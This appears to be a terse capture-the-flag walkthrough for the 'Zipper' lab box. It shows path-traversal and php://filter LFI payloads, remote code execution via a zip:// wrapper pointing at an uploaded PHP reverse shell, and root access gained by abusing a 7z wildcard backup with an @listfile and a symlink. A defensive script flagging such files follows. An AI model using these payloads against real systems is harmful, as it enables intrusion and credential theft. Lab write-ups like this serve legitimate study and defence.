WDavid404 / PG-Box

PG box walkthrough note

Zipper (Hard, linux, 2022) #43

Open WDavid404 opened 3 months ago

WDavid404 commented 3 months ago

Keypoints:

WDavid404 commented 3 months ago
```
PORT      STATE    SERVICE     REASON         VERSION
22/tcp    open     ssh         syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open     http        syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Zipper
```

80/tcp --> click the "Home(current)" link, which goes to http://192.168.196.229/index.php?**file=home** --> it may have an LFI vulnerability.

Try

```
../../../../../../etcpasswd
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
```
..

--> didn't work

Finally, `php://filter/convert.base64-encode/resource=index` --> [image]

Try `php://filter/convert.base64-encode/resource=upload` (because we found the /upload page) [image]

https://rioasmara.com/2021/07/25/php-zip-wrapper-for-rce/ --> 192.168.196.229/index.php?file=zip://uploads/upload_1722343257.zip%23php_reverse_me1
(Note:

PE

linpeas:

cat /opt/backups/backup.log --->

```
7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /opt/backups/backup.zip
--
Path = /opt/backups/backup.zip
Type = zip
Physical Size = 818

Scanning the drive:
3 files, 394 bytes (1 KiB)

Updating archive: /opt/backups/backup.zip

Items to compress: 3

Files read from disk: 3
Archive size: 818 bytes (1 KiB)

Scan WARNINGS for files and folders:

WildCardsGoingWild : No more files
----------------
Scan WARNINGS: 1
```

According to https://book.hacktricks.xyz/linux-hardening/privilege-escalation/wildcards-spare-tricks [image] [image] and execute `cat /opt/backups/backup.log` again --> No change...

And we can find that there were @enox.zip and enox.zip -> /root/secret, which is doing the thing we just did. So "WildCardsGoingWild" in the backup.log file is actually the secret of root. Try `su root` and use WildCardsGoingWild as the password --> works!! [image]
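
From the defender's side, the `@enox.zip` / `enox.zip -> /root/secret` pair in the note above is something a check can flag before a backup job runs. The following is an added example, not part of the original note: it assumes the job runs 7z with a shell wildcard inside the directory, and `audit_backup_dir` and `demo` are hypothetical names that work on a constructed temporary directory.

```python
import os
import tempfile

def audit_backup_dir(path):
    """Return (name, reason) findings for entries a wildcard archive job would misread."""
    findings = []
    root = os.path.realpath(path)
    for name in sorted(os.listdir(path)):
        full = os.path.join(path, name)
        if name.startswith("@"):
            # 7z treats an @name argument as a list file, not as a file to archive
            findings.append((name, "listfile-argument"))
        if name.startswith("-"):
            # a leading dash is parsed as a command-line switch
            findings.append((name, "switch-argument"))
        if os.path.islink(full):
            target = os.path.realpath(full)
            # a link resolving outside the backup directory can expose other files
            if os.path.commonpath([root, target]) != root:
                findings.append((name, "symlink-outside-dir"))
    return findings

def demo():
    """Build a constructed directory mirroring the note's @enox.zip / enox.zip pair."""
    with tempfile.TemporaryDirectory() as outside, tempfile.TemporaryDirectory() as d:
        secret = os.path.join(outside, "secret")  # stands in for /root/secret
        with open(secret, "w") as fh:
            fh.write("constructed-secret\n")
        open(os.path.join(d, "@enox.zip"), "w").close()
        os.symlink(secret, os.path.join(d, "enox.zip"))
        open(os.path.join(d, "site.zip"), "w").close()  # ordinary file, not flagged
        return audit_backup_dir(d)

if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

On the backup job itself, 7z's `--` argument stops switch and `@listfile` parsing, and passing `./*` instead of `*` keeps file names from being read as either.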